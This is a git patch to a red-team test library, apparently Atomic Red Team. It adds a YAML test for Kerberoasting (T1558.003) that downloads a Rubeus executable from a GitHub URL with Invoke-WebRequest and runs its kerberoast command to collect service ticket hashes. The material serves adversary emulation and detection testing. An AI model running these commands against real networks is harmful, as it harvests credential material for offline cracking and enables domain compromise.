From ad98393d8b44d02f422e76927901e8ea30b71c96 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Fri, 20 Aug 2021 15:17:49 -0500
Subject: [PATCH] rubeus-kerberoasting (#1609)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1558.003/T1558.003.yaml | 48 ++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)

diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 58abe080..597849a6 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -26,3 +26,51 @@ atomic_tests:
       Invoke-Kerberoast | fl
     name: powershell
 
+- name: Rubeus kerberoast
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+    flags:
+      description: command flags you would like to run (optional and blank by default)
+      type: String
+      default: 
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false
\ No newline at end of file